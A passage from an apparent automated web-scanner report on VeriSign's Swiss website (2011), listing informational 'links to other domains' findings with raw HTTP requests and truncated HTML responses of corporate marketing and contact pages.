Latin America</a>...[SNIP]... <li><a href='//www.verisign.com/mx/'> Mexico</a>...[SNIP]... <li><a href='//www.verisign.com/nl/'> Netherlands</a>...[SNIP]... <li><a href='//www.verisign.co.nz/'> New Zealand</a>...[SNIP]... <li><a href='//www.verisign.com.sg/'> Singapore</a>...[SNIP]... <li><a href='//www.verisign.com.tw/'> Taiwan</a>...[SNIP]... <li><a href='//www.verisign.com/'> United States</a>...[SNIP]... <li><a href='//www.verisign.co.uk/'> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en">...[SNIP]... <param name="allowScriptAccess" value="always"> <embed src="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/> </object>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'> Two-Factor Authentication</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'> Digital IDs for Secure Email</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'> Detect Fraud Online</a>...[SNIP]... <a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /> </a>...[SNIP]... <p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html"> Email support for login help.</a>...[SNIP]... </div> <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /> </a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'> SSL Certificates Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'> VeriSign Trust™ Seal Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'> Code Signing Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'> Digital IDs for Secure Email Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'> Managed PKI Support</a>...[SNIP]... </div> <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /> </a>...[SNIP]... <li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href='https://products.verisign.com/geocenter/reseller/logon.do'> VeriSign Partner Center Sign In</a>...[SNIP]... <div class="buttondiv-ie"><a class="trybutton" href="https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH"> <span>...[SNIP]... <div class="ab_cell"><a class="accelbtn" href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH"> <span class="ab_buybtn">...[SNIP]... </a> <a href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH"> VeriSign Trust Seal</a>...[SNIP]... <div class="ab_cell"><a class="accelbtn" href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> <span class="ab_signinbtn">...[SNIP]... </a> <a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center</a>...[SNIP]... <a href='/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=hp_promo' ><img src='http://cdn.verisign.com/authweb/global/assets/shared/images/shoppingcart.png' alt="VeriSign Trusted" height='84' /> </a>...[SNIP]... <a href='/ssl/ssl-information-center/diginotar-breach-alert/index.html' ><img src='http://cdn.verisign.com/authweb/global/assets/shared/images/hp-promo-fingerprint.png' alt="SSL Security Breaking News." height='84' /> </a>...[SNIP]... <a class='promo_img' href='/verisigninc' rel='external'><img src='http://cdn.verisign.com/authweb//en_ch/assets/home/images/verisign_inc_promo_home.png' alt='Discover the brand new look of Verisign - Domain Name Services, Network Intelligence and DNS Availability are now at http://www.verisigninc.com/en_CH/index.xhtml'> </a>...[SNIP]... <li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'> News</a></li><li><a href='//blogs.verisign.com/?tid=footer'> Blogs</a>...[SNIP]... <li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'> Worldwide Sites</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'> two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'> identity protection</a>...[SNIP]... </a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'> PKI</a>). Symantec products include <a href='http://ch.norton.com/'> Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'> Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'> PC Tools</a>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"> </script>...[SNIP]...
14.65. http://www.verisign.ch/contact-information/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/contact-information/index.html
Issue detail
The page was loaded from a URL containing a query string:http://www.verisign.ch/contact-information/index.html?tid=footer The response contains the following links to other domains:http://blogs.verisign.com/ http://blogs.verisign.com/?tid=footer http://cdn.verisign.com/assets/shared/css/header.css http://cdn.verisign.com/assets/shared/js/curvycorners.js http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 http://ch.norton.com/ http://press.verisign.com/ http://smallbusiness.norton.com/ http://verisign.com/partnersupport/worldwide/partnersupport.html http://www.addthis.com/bookmark.php?v=250 http://www.pctools.com/de/ http://www.symantec.com/ http://www.symantec.com/de/ch/about/news/release/index.jsp http://www.verisign.co.jp/ http://www.verisign.co.nz/ http://www.verisign.co.uk/ http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps http://www.verisign.com.au/ http://www.verisign.com.br/ http://www.verisign.com.hk/ http://www.verisign.com.sg/ http://www.verisign.com.tw/ http://www.verisign.com/ http://www.verisign.com/ar/ http://www.verisign.com/ca/ http://www.verisign.com/cl/ http://www.verisign.com/latinamerica/esp/ http://www.verisign.com/mx/ http://www.verisign.com/nl/ http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo http://www.verisign.com/press/awards/index.html http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html http://www.verisign.com/verisign-worldwide/index.html http://www.verisign.com/verisign-worldwide/index.html?tid=footer http://www.verisignchina.com.cn/ http://www.verisigninc.com/en_CH/index.xhtml?loc=en_CH https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport https://press.verisign.com/easyir/customrel.do?easyirid=AFC0FF0DB5C560D3&version=live&prid=458311&releasejsp=custom_97 https://products.verisign.com/geocenter/reseller/logon.do https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://www.verisign.com/cgi-bin/go.cgi?a=w18450112575241018
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7]>...[SNIP]... <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" /> <script type="text/javascript">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script> <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /> </a>...[SNIP]... <li><a href='//www.verisign.com/ar/'> Argentina</a>...[SNIP]... <li><a href='//www.verisign.com.au/'> Australia</a>...[SNIP]... <li><a href='//www.verisign.com.br/'> Brazil</a>...[SNIP]... <li><a href='//www.verisign.com/ca/'> Canada</a>...[SNIP]... <li><a href='//www.verisign.com/cl/'> Chile</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.com.hk/'> Hong Kong</a>...[SNIP]... <li><a href='//www.verisign.co.jp/'> Japan</a>...[SNIP]... <li><a href='//www.verisign.com/latinamerica/esp/'> Latin America</a>...[SNIP]... <li><a href='//www.verisign.com/mx/'> Mexico</a>...[SNIP]... <li><a href='//www.verisign.com/nl/'> Netherlands</a>...[SNIP]... <li><a href='//www.verisign.co.nz/'> New Zealand</a>...[SNIP]... <li><a href='//www.verisign.com.sg/'> Singapore</a>...[SNIP]... <li><a href='//www.verisign.com.tw/'> Taiwan</a>...[SNIP]... <li><a href='//www.verisign.com/'> United States</a>...[SNIP]... <li><a href='//www.verisign.co.uk/'> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en">...[SNIP]... <param name="allowScriptAccess" value="always"> <embed src="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/> </object>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'> Two-Factor Authentication</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'> Digital IDs for Secure Email</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'> Detect Fraud Online</a>...[SNIP]... <a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /> </a>...[SNIP]... <p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html"> Email support for login help.</a>...[SNIP]... </div> <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /> </a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'> SSL Certificates Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'> VeriSign Trust™ Seal Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'> Code Signing Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'> Digital IDs for Secure Email Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'> Managed PKI Support</a>...[SNIP]... </div> <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /> </a>...[SNIP]... <li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href='https://products.verisign.com/geocenter/reseller/logon.do'> VeriSign Partner Center Sign In</a>...[SNIP]... <li><a href="//www.symantec.com/de/ch/about/news/release/index.jsp"> News</a> <ul> <li><a href="//press.verisign.com/"> Press Release Archives</a>...[SNIP]... <li><a href="//www.verisign.com/press/awards/index.html"> Awards</a></li> <li><a href="//blogs.verisign.com/"> Blogs</a></li> <li><a href="//www.verisign.com/verisign-worldwide/index.html"> Worldwide Sites</a>...[SNIP]... <div id="emailPrint" class="emailPrint"> <a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"> <img style="margin-bottom: 0px;" src="/assets/shared/images/dev044079.gif" alt="Email">...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... <p> VeriSign Authentication Services, now part of <a href="//www.symantec.com"> Symantec Corp.</a>...[SNIP]... <p>For billing address and payment information please <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601"> click here</a>...[SNIP]... <br /> For billing address and payment information please <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601"> click here</a>...[SNIP]... <br /><a href="//www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html"> Report VeriSign Seal Abuse</a>...[SNIP]... <br/> <a href="http://www.verisign.co.uk/"> <strong>...[SNIP]... <br /> or <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w18450112575241018"> submit an enquiry online</a>...[SNIP]... <div class="im" style="margin: 0px 0px 12px;"><a id="a_imlinks" name="a_imlinks" class="imlinks" href="https://press.verisign.com/easyir/customrel.do?easyirid=AFC0FF0DB5C560D3&version=live&prid=458311&releasejsp=custom_97"> <img id="imgOne" src="/assets/corp/images/corp_promo_awards_3.gif" alt="Awards 2009" title="Awards 2009"/>...[SNIP]... </div> <a style="display:block" href="//www.verisigninc.com/en_CH/index.xhtml?loc=en_CH" rel="external"> <img src="/assets/naming/images/Naming_rightPromo.gif" alt="Discover the Brand New Look of Verisign - Domain Name Services, Network Intelligence, and DNS Availability are now at verisigninc.com"/>...[SNIP]... <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7]>...[SNIP]... <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" /> <script type="text/javascript">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script> <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'> News</a></li><li><a href='//blogs.verisign.com/?tid=footer'> Blogs</a>...[SNIP]... <li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'> Worldwide Sites</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'> two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'> identity protection</a>...[SNIP]... </a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'> PKI</a>). Symantec products include <a href='http://ch.norton.com/'> Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'> Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'> PC Tools</a>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]...
14.66. http://www.verisign.ch/corporate/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Issue detail
The page was loaded from a URL containing a query string:http://www.verisign.ch/corporate/index.html?tid=footer The response contains the following links to other domains:http://blogs.verisign.com/ http://blogs.verisign.com/?tid=footer http://cdn.verisign.com/assets/shared/css/header.css http://cdn.verisign.com/assets/shared/js/curvycorners.js http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js http://ch.norton.com/ http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751 http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-irhomeNews http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent http://player.ooyala.com/player.swf?embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&version=2 http://press.verisign.com/ http://smallbusiness.norton.com/ http://twitter.com/verisign http://verisign.com/partnersupport/worldwide/partnersupport.html http://www.addthis.com/bookmark.php?v=250 http://www.facebook.com/VeriSignAuthentication http://www.pctools.com/de/ http://www.symantec.com/ http://www.symantec.com/about/careers/index.jsp http://www.symantec.com/about/news/release/article.jsp?prid=20100809_01 http://www.symantec.com/business/theme.jsp?themeid=vs http://www.symantec.com/content/en/us/enterprise/other_resources/b-verisign_faq.pdf http://www.symantec.com/de/ch/about/news/release/index.jsp http://www.verisign.co.jp/ http://www.verisign.co.nz/ http://www.verisign.co.uk/ http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps http://www.verisign.com.au/ http://www.verisign.com.br/ http://www.verisign.com.hk/ http://www.verisign.com.sg/ http://www.verisign.com.tw/ http://www.verisign.com/ http://www.verisign.com/ar/ http://www.verisign.com/ca/ http://www.verisign.com/cl/ http://www.verisign.com/hp07/j/swfobj.js http://www.verisign.com/latinamerica/esp/ http://www.verisign.com/mx/ http://www.verisign.com/nl/ http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo http://www.verisign.com/press/awards/index.html http://www.verisign.com/verisign-worldwide/index.html http://www.verisign.com/verisign-worldwide/index.html?tid=footer http://www.verisignchina.com.cn/ http://www.verisigninc.com/en_CH/index.xhtml?loc=en_CH http://www.youtube.com/verisignauth https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport https://products.verisign.com/geocenter/reseller/logon.do https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://www4.symantec.com/events/controller?c=listing
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" language="JavaScript"> </script><script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js" language="JavaScript"> </script><script type="text/JavaScript" src="//www.verisign.com/hp07/j/swfobj.js"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">...[SNIP]... <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7]>...[SNIP]... <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" /> <script type="text/javascript">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script> <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /> </a>...[SNIP]... <li><a href='//www.verisign.com/ar/'> Argentina</a>...[SNIP]... <li><a href='//www.verisign.com.au/'> Australia</a>...[SNIP]... <li><a href='//www.verisign.com.br/'> Brazil</a>...[SNIP]... <li><a href='//www.verisign.com/ca/'> Canada</a>...[SNIP]... <li><a href='//www.verisign.com/cl/'> 